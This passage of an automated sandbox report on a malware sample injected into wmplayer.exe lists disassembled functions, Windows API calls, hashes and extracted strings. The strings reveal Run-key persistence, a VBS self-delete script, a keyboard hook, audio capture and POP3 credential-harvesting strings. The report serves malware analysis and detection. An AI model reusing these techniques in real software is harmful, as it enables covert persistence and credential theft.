                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                            • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                            • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                              • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                              • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                              • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                            • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                            • API String ID: 4250697656-2665858469
                                                                                            • Opcode ID: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                            • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                            • Opcode Fuzzy Hash: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                            • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                            Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                            • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                            • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                            • API String ID: 1861856835-3168347843
                                                                                            • Opcode ID: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
                                                                                            • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                                                            • Opcode Fuzzy Hash: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
                                                                                            • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                                                            Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                            • ExitProcess.KERNEL32 ref: 0040C287
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                            • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                            • API String ID: 3797177996-1998216422
                                                                                            • Opcode ID: 54639b7d9ee10e7a81b53f3e46565cc10b582b28373b0b397b468ca4c2ae59ea
                                                                                            • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                            • Opcode Fuzzy Hash: 54639b7d9ee10e7a81b53f3e46565cc10b582b28373b0b397b468ca4c2ae59ea
                                                                                            • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                            Function 0041A1BB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                            • SetEvent.KERNEL32 ref: 0041A38A
                                                                                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                            • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                            • API String ID: 738084811-1408154895
                                                                                            • Opcode ID: 8f16ee43b4cb6b1ec4ac042b243efdd7e82b32275b6d04eeba487ce5541c5dfc
                                                                                            • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                            • Opcode Fuzzy Hash: 8f16ee43b4cb6b1ec4ac042b243efdd7e82b32275b6d04eeba487ce5541c5dfc
                                                                                            • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                            Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                            • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                            • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                            • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$Write$Create
                                                                                            • String ID: RIFF$WAVE$data$fmt
                                                                                            • API String ID: 1602526932-4212202414
                                                                                            • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                            • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                            • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                            • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                            Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Program Files (x86)\Windows Media Player\wmplayer.exe,00000001,004068B2,C:\Program Files (x86)\Windows Media Player\wmplayer.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: C:\Program Files (x86)\Windows Media Player\wmplayer.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                            • API String ID: 1646373207-2501814721
                                                                                            • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                            • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                            • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                            • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                            Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 0040BC75
                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                            • CopyFileW.KERNEL32(C:\Program Files (x86)\Windows Media Player\wmplayer.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                            • _wcslen.LIBCMT ref: 0040BD54
                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                            • CopyFileW.KERNEL32(C:\Program Files (x86)\Windows Media Player\wmplayer.exe,00000000,00000000), ref: 0040BDF2
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                            • _wcslen.LIBCMT ref: 0040BE34
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                            • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                            • String ID: 6$C:\Program Files (x86)\Windows Media Player\wmplayer.exe$del$open$BG$BG
                                                                                            • API String ID: 1579085052-325541018
                                                                                            • Opcode ID: dc10b710cf19d5e546024f9218f411ba7f3a987ff1f587e32df4140d18237521
                                                                                            • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                            • Opcode Fuzzy Hash: dc10b710cf19d5e546024f9218f411ba7f3a987ff1f587e32df4140d18237521
                                                                                            • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                            Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                              • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                              • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                            • _strlen.LIBCMT ref: 10001855
                                                                                            • _strlen.LIBCMT ref: 10001869
                                                                                            • _strlen.LIBCMT ref: 1000188B
                                                                                            • _strlen.LIBCMT ref: 100018AE
                                                                                            • _strlen.LIBCMT ref: 100018C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen$File$CopyCreateDelete
                                                                                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                            • API String ID: 3296212668-3023110444
                                                                                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                            • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                            • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                            Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                            • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                            • _wcslen.LIBCMT ref: 0041B2DB
                                                                                            • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                            • GetLastError.KERNEL32 ref: 0041B313
                                                                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                            • GetLastError.KERNEL32 ref: 0041B370
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                            • String ID: ?
                                                                                            • API String ID: 3941738427-1684325040
                                                                                            • Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                            • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                            • Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                            • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                            Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: %m$~$Gon~$~F@7$~dra
                                                                                            • API String ID: 4218353326-230879103
                                                                                            • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                            • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                            • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                            • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                            Function 0044E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$EnvironmentVariable$_wcschr
                                                                                            • String ID:
                                                                                            • API String ID: 3899193279-0
                                                                                            • Opcode ID: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                                                                            • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                            • Opcode Fuzzy Hash: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                                                                            • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                            Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
